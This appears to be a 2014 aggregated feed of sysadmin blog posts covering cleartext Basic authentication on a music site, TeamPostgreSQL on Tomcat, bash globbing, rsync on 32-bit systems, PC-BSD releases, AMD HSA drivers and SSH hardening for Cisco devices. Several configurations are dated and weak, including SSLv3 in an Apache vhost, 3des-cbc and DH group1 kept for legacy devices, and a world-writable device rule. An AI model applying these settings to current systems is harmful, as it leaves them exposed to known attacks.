What became obvious to me while failing to log in to Magnatune was that the connection was not secure: it was trying to get me to log in over cleartext HTTP. So I checked the headers to figure out which kind of authentication it was doing. At this point I have to use “of course” to say that it is using Basic authentication: cleartext username and password on the wire. This is extremely troublesome.

While not encrypting email reduces the attack surface, making it mostly a matter of people sniffing at the datacenter where Magnatune is hosted (assuming you use an email provider that is safe or trustworthy enough; I consider mine so), using Basic authentication extends the surface immensely. Indeed, if you’re logging in to Magnatune from a coffee shop or any other public open WiFi, you are literally broadcasting your username and password over the network.

I can’t know whether you can change your Magnatune password once you can log in, since I can’t log in. But I know that the alternative to the download membership is the streaming membership, which makes it very likely that a Magnatune user would log in while at a Starbucks, so that they can work on some blog post or on the source code of their mobile app while listening to music. I would hope they use a different password for Magnatune than for their email account, since, as I noted above, you can get to their email address just by knowing their username.

I don’t worry too much. My Magnatune password turned out to be different enough from most of my other passwords that even if I don’t change it and it gets leaked, it won’t compromise any other service. Even more so now that I’m actively gathering all my accounts and changing their passwords.

Elefantenhaus My Universe | 2014-09-06 13:15 UTC

There are numerous technical reasons why one might want to prefer PostgreSQL over another RDBMS like MySQL or MariaDB; ultimately, though, it comes down to the deployment scenario, which is why there can also be good reasons for MySQL & Co (e.g. read speed) as well as less good ones (e.g. Wordpress' fixation on MySQL).

There is also a weighty non-technical argument for the blue elephant: with MariaDB 10, Monty & Co have decided to at least partially break compatibility with MySQL, and it is currently hard to foresee which of the two database systems will prevail in the long run, let alone how applications will deal with the incompatibilities that will in all likelihood keep growing.

Anyone who wants to switch to PostgreSQL, for whatever reason, will sooner or later ask about a decent, web-based administration interface; after all, MySQL has quite a mature tool in phpMyAdmin. The standard answer is usually phpPgAdmin; a tool, however, that by now looks rather dated and whose further development appears to be progressing sluggishly.

A really good alternative can be found in TeamPostgreSQL, which offers a modern, AJAX-based interface and brings along plenty of useful capabilities, such as an SQL editor with auto completion or in-line editing of records. The only catch: it is a Java web application, which supposedly makes deployment complicated, especially since the software currently lacks any documentation.

That is not really the case, though. For a solid production system, however, the built-in Jetty container should not be used, but rather a “grown-up” servlet container such as Apache Tomcat. On FreeBSD it can be conveniently installed via pkg, along with its dependencies. TeamPostgreSQL then (almost) installs itself…

pkg install tomcat8

cat >> /etc/rc.conf << EOF  
tomcat8_enable="YES"
EOF

cd ~  
cd teampostgresql  
cp -r webapp /usr/local/apache-tomcat-8.0/webapps/  
cd /usr/local/apache-tomcat-8.0/webapps/  
mv webapp teampostgresql  
chown -R www:www teampostgresql  
mkdir -p /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
chown www:www /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
All that is missing now is a usable configuration for TeamPostgreSQL. It is placed in the file webapps/teampostgresql/WEB-INF/teampostgresql-config.xml (a file with default values already exists and merely needs to be updated):

<?xml version="1.0" encoding="UTF-8"?>  
<config xmlns:xsi="" xsi:type="config">  
Now Tomcat can be started:

service tomcat8 start  
From now on, TeamPostgreSQL should be available under /teampostgresql. Anyone who wants to give the tool its own subdomain and already runs a reverse proxy anyway can use a configuration along these lines:

<VirtualHost [2001:db8::1]:80>  
    ErrorLog /var/log/pgsql-error.log
    CustomLog /var/log/pgsql-access.log combined

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied
    </Proxy>
</VirtualHost>

<VirtualHost [2001:db8::1]:443>  
    ErrorLog /var/log/pgsql-error-ssl.log
    CustomLog /var/log/pgsql-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass /
    ProxyPassReverse /
    ProxyPreserveHost On
</VirtualHost>
This makes it possible to no longer expose Tomcat to the outside at all and to additionally protect the web application via SSL.

Bash has many subtle pitfalls, some of them able to live unnoticed for a very long time. A common example of such a pitfall is ubiquitous filename expansion, or globbing. What many script writers fail to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns; square brackets ([) do as well. Secondly, by default bash (and POSIX shell) takes failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides two major facilities that can help you catch these mistakes: the shopt options nullglob and failglob.

The nullglob option is a good default choice for your script. After enabling it, failed filename expansions result in no parameters rather than the verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done
Without nullglob, the above may actually pass a/* verbatim if no file matches the pattern. For this reason, you would need an additional check for the existence of the file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match, the loop won't run even once.

Secondly, it turns every accidental glob into nothing. While this isn't the most friendly warning, and in fact it may have very undesired results, you're more likely to notice that something is going wrong.
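The difference is easy to see in an empty scratch directory (a quick sketch using mktemp; the *.conf pattern is arbitrary):

```shell
#!/usr/bin/env bash
# No file matches *.conf in a fresh temporary directory.
cd "$(mktemp -d)" || exit 1

set -- *.conf                  # default: the failed glob is kept verbatim
echo "default: $# argument(s), first is '$1'"

shopt -s nullglob
set -- *.conf                  # nullglob: the failed glob expands to nothing
echo "nullglob: $# argument(s)"
```

The first echo reports one argument, the literal string *.conf; the second reports zero arguments.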

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way. That is, of course, assuming the pattern doesn't accidentally expand into something valid first.

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I noticed myself hitting lately is the attempt to use unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done
At first glance, everything looks fine: ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that the words in ${v} are subject to filename expansion. For example, if a lone asterisk happens to be there (like v='10 * 4'), you'd actually get all the files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.
Personally, I dislike the first two since they require set-and-restore magic, and the second also has the penalty of doing the globbing and then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done
While normally read is used to read from files, we can use bash's here-string syntax to feed the variable into it. The -r option disables backslash escape processing, which is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like a newline). -a words causes it to put the split words into the array ${words[@]}; and since we know how to safely iterate over an array, the underlying issue is solved.
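Putting the pitfall and the fix side by side makes the difference obvious (a quick sketch; the touched file names are arbitrary):

```shell
#!/usr/bin/env bash
cd "$(mktemp -d)" || exit 1
touch file-a file-b            # give the stray asterisk something to match

v='10 * 4'

# Unquoted expansion: the asterisk is glob-expanded into file names.
for i in ${v}; do echo "naive: ${i}"; done

# read-based splitting: words are split, nothing is globbed
# (read returns non-zero at EOF here, which is harmless).
read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do echo "safe: ${i}"; done
```

The naive loop prints 10, file-a, file-b, 4; the read-based loop prints 10, *, 4, preserving the asterisk as a word.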

32bit Madness Patrick's playground | 2014-09-05 06:41 UTC

This week I ran into a funny issue doing backups with rsync:
rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

By popular demand, the source tree for the Lumina project has just been moved to its own repository within the main PC-BSD project tree on GitHub.

In addition to this, an official FreeBSD port for Lumina was just committed to the FreeBSD ports tree which uses the new repo.


By the way, here is a quick usage summary for those that are interested in how “light” Lumina 0.6.2 is on PC-BSD 10.0.3:

System: Netbook with a single 1.6GHz atom processor and 2GB of memory (Fresh installation of PC-BSD 10.0.3 with Lumina 0.6.2)

Usage: ~0.2–0.4% CPU and ~120MB active memory use (no apps running except an xterm with “top” after a couple minutes for the PC-BSD tray applications to start up and settle down)

Last night, this worked fine. This morning, it fails:

# ansible-playbook jail-mailjail.yml

PLAY [mailjails] **************************************************************

GATHERING FACTS ***************************************************************
failed: [] => {"failed": true, "parsed": false}
invalid output was: Sorry, try again.
Sorry, try again.
Sorry, try again.
sudo: 3 incorrect password attempts

TASK: [pkg | install pkg] *****************************************************
FATAL: no hosts matched or all hosts [...]

PC-BSD 10.0.3-RC2 ISO images are now available for testing.

Users on the EDGE package set, or 10.0.3-RC1 can update to the newer set with the following commands:

# pkg update -f
# pkg upgrade
# pc-extractoverlay ports

This update brings in the newer pkgng 1.3.7, which may need to re-install many of your packages in order to properly fix an issue with shared-library version detection in previous pkgng releases.

The current plan is to release 10.0.3 early next week, so please let us know of any issues right away via our RedMine bug tracker.

AMD HSA Patrick's playground | 2014-09-03 06:25 UTC

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogeneous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:
[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./ 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways.
These ebuilds can be found here

Since there's at least one binary file with an undeclared license, plus some other inconsistencies, I cannot recommend installing these packages right now.
And of course I hope that AMD will release the source code of these libraries ...

There's an example "vector_copy" program included; it mostly works, but appears to go into an infinite loop. Output looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform for some epic number crunching :)

Mirror, Mirror My Universe | 2014-09-02 18:03 UTC

With the latest update of the pacman mirrorlist, my Arch Linux mirror server was accepted as an official Tier 2 mirror. The mirror can be reached at and, besides HTTP and HTTPS, also offers rsync support; it is reachable over both IPv4 and IPv6.

Following the last post on SSH configuration for Cisco IOS and the Cisco ASA, it occurred to me that sensible adjustments to the client configuration are worth writing about as well. At least on Mac OS (and at least on Debian and older Ubuntu Linux, too), the optimal cryptography is not always used by default.
The SSH parameters can be configured in two places:

  • system-wide in /etc/ssh_config
  • per user in ~/.ssh/config
In the system-wide SSH config you will find, for example, the following three lines, which determine large parts of the cryptography in use (strictly speaking, they show the defaults):

#Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour
#KexAlgorithms ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
#MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96
What can or should be changed?


If you have no legacy systems to maintain, you could drop all non-AES ciphers. But devices such as 2950 switches are still encountered every now and then, in which case 3des-cbc has to stay configured as well. The Ciphers line could then look like this:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
According to the man page (and based on OpenSSH 6.2, the version shipped with Mavericks), the more modern GCM types should also be supported. When they are configured, however, the SSH client reports "Bad SSH2 cipher spec".
When accessing Cisco routers and switches, the CBC variants are typically negotiated, since CTR is only supported from IOS 15.4 onwards.

This controls the key exchange. My config line on the Mac is the following:

KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I removed the elliptic-curve algorithms, since they are suspected of containing backdoors. The presumably trustworthy curve25519 by D. J. Bernstein is only included as of OpenSSH 6.6p1; I will add it as soon as it is available. The last entry on the line is still a group1 exchange (a fixed 1024-bit group), which is needed for legacy devices.
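Once OpenSSH 6.6p1 or newer is in place, the line could be extended like this (a sketch based on the algorithm name used in that release, curve25519-sha256@libssh.org):

```
KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
```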

What bothers me most is that an MD5 method has the highest priority, followed by a SHA-1 method. That order should be adjusted:

The etm MACs are interesting. A short digression into message authentication codes: by default, the protocols SSL, IPsec and SSH use different approaches to encrypt data and protect its integrity:

  • SSL: mac-then-encrypt. The MAC is computed first, then data and MAC are encrypted together.
  • IPsec: encrypt-then-mac. The data is encrypted first, and the MAC is then computed over the ciphertext.
  • SSH: encrypt-and-mac. The data is encrypted, but the MAC is computed over the plaintext.
It has turned out that of these three options, the method used by IPsec is the most secure. These encrypt-then-mac (etm) schemes can also be used with SSH.
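A reordered MACs line that prefers SHA-2 and the etm variants could, for example, look like this (an assumption, not necessarily the author's exact line; availability of the etm names depends on the OpenSSH version in use):

```
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1
```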

So what changes when accessing an IOS device? Without these adjustments, the SSH session looks like this (on a Cisco 3560 running IOS 15.0(2)SE5):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	            Username
1          2.0     IN   aes128-cbc  hmac-md5     Session started   ki
1          2.0     OUT  aes128-cbc  hmac-md5     Session started   ki
aes128-cbc with an MD5 HMAC is used. After the changes, the crypto is somewhat better (within the limits of what IOS offers):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	           Username
0          2.0     IN   aes256-cbc  hmac-sha1    Session started   ki
0          2.0     OUT  aes256-cbc  hmac-sha1    Session started   ki
Here, once again, the resulting ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
After some thought I concluded that I did not really like having the legacy algorithms in the config file. So I threw them out again and instead pass the required crypto directly when connecting to older devices. Here is an example for accessing a 2950:

ssh -l ki -o Ciphers="3des-cbc" -o KexAlgorithms="diffie-hellman-group1-sha1"
And here the adjusted ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1
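Instead of passing -o options on every invocation, the legacy crypto can also be pinned to individual hosts in ~/.ssh/config, since Host blocks override the global defaults (the host alias here is a placeholder):

```
Host old-2950
    Ciphers 3des-cbc
    KexAlgorithms diffie-hellman-group1-sha1
```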
Further suggestions for improvement are gladly accepted.

The ports tree has been modified to support only pkg(8) as the package management system for all supported versions of FreeBSD.

If you were still using pkg_install (the pkg_* tools), you will have to upgrade your system.

The simplest way is:

cd /usr/ports/ports-mgmt/pkg
make install

then run

pkg2ng

You will see lots of warnings; don't be scared, they are expected. The pkg_* databases used to get mangled easily, and pkg2ng is able to deal with that most of the time.

If you do encounter a problem, however, then please report it to

A tag has been applied to the ports tree in case you need to fetch the latest ports tree from before the EOL of pkg_install:

A branch has been created in case some committers want to provide updates for pkg_install users:

Please note that this branch is not officially maintained and that we strongly recommend you migrate to pkg(8).

The ports tree is now fully staged (only 2% was left unstaged; those ports are marked as broken and will be removed from the ports tree if no PR to stage them is pending in Bugzilla).

I would like to thank every committer and maintainer for their work on staging!
It allowed us to convert more than 23k packages to support staging in only 11 months!

Staging is a very important step: it already allows us to run quality-testing scripts on the packages (which has uncovered and fixed tons of hidden problems), and it allows us to build packages as a regular user!

It also opens the gates to new features that users have been requesting for many years:

  • flavors
  • multiple packages
Expect those features to happen in the near future.

Every now and then I am genuinely startled by what Cisco employees put out. Someone has just published a document in the Cisco Support Community on configuring SSH on the ASA. In it you can read, for example, that a key size of 1024 bits should be used, and there is nothing about today's best practices for an SSH config. Reason enough to show what I consider a "proper" SSH config for IOS devices and the ASA:

Cisco IOS
It starts with generating an RSA key pair that is used only for the SSH process. For that, the key pair is given a label:

crypto key generate rsa label SSH-KEY modulus 4096
The key length deserves some thought. Longer means more secure, but also slower; not so slow, however, that it becomes unusable, which makes the decision fairly easy. General guidance on minimum key lengths can be found, among other places, at

The RSA key pair is assigned to the SSH configuration:

ip ssh rsa keypair-name SSH-KEY
Allow only SSHv2:

ip ssh version 2
During connection setup, the session keys are generated via Diffie-Hellman. By default this is allowed with group 1 (768 bits), which is no longer state of the art, so a higher DH group is configured. Note, however, that the current version (0.63) of PuTTY cannot handle a 4096-bit key exchange, while SecureCRT as well as the built-in SSH of Mac OS and Linux work fine. If you want to administer devices with PuTTY, use only 2048 here, which is of course still very secure.

ip ssh dh min size 4096
Login events should be logged:

ip ssh logging events
Finally, only SSH is allowed on the VTY lines, which disables Telnet:

line vty 0 4
  transport input ssh
What else could be configured for SSH? Every now and then the wish comes up to run SSH on a port other than TCP/22. That does not necessarily increase security, but it does keep the logs a bit smaller when SSH is reachable from the Internet:

ip ssh port 7890 rotary 1
line vty 0 4
  rotary 1
If access comes in through an interface that has an inbound ACL configured, that ACL must of course also permit this traffic.

Further protection mechanisms worth considering are control-plane protection and, if out-of-band management is used, management-plane protection. If SSH access is not needed from "any", an access-class should of course also be configured on the lines. But that, too, is not SSH-specific.
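An access-class restricting the VTY lines to a management network could be sketched like this (the ACL name is a placeholder, and the permitted source network is intentionally left open):

```
ip access-list standard MGMT-ACCESS
 permit
line vty 0 4
  access-class MGMT-ACCESS in
```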

Cisco ASA
For the ASA, pretty much everything above applies, except that the SSH configuration cannot be adjusted as extensively, and parts of the syntax differ:

crypto key generate rsa modulus 4096
ssh version 2
ssh key-exchange group dh-group14-sha1
The key length here also depends on the platform: the legacy ASAs do not support keys longer than 2048 bits, while on the current -X devices 4096 bits can be used as well.

SSH access on the ASA must also be explicitly permitted for the management IPs:

ssh inside
ssh outside

Decluttered My Universe | 2014-08-31 21:19 UTC

I spent today reviewing and cleaning up my portfolio of half-finished projects. In particular, I have now parted ways with projects from my wild C days: no loss, considering that this stuff had not seen any maintenance in years, and urgently necessary, considering that family, house, garden and job also demand their tribute.

What remains is a manageable list of projects that I will keep working on, albeit probably rather sporadically:


Magrathea is a nascent rewrite of the by now rather dated Planet Planet. The motivation for the project was, and is, clearly to replace Planet Planet for the planet. A large chunk of the functionality has been implemented since my own Summer of Code (read: Denmark vacation); completing it will still take a few more weekends, though.

If everything goes smoothly, Magrathea could have a first beta by late autumn, and perhaps even a first release by Christmas. For me that puts it in the category of short-term projects.

Beastie's Fortress

Beastie's Fortress is an online book project. Over the last few years a lot of installation notes for Unix servers have piled up, so the idea suggested itself to compile them into a "best of". Part of the text already exists as reStructuredText, but is far from fit for publication.

This project has the invaluable advantage that it does not have to be finished in its entirety: individual chapters can be published without the whole book being ready for print. Beastie's Fortress will therefore be more of a gap-filling companion project that I will work on as mood, whim (and boredom) allow.


So far, Stormrose exists only as an idea in my head. In the past I made several attempts to develop a comfortable remote management tool for Unix servers, but I never had the feeling that those attempts actually made an admin's work easier. I still enjoy the conceptual work a lot, so perhaps a piece of software will actually emerge from it in the long run; or perhaps the project will simply render itself obsolete once the cloud has come for the last of us.

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

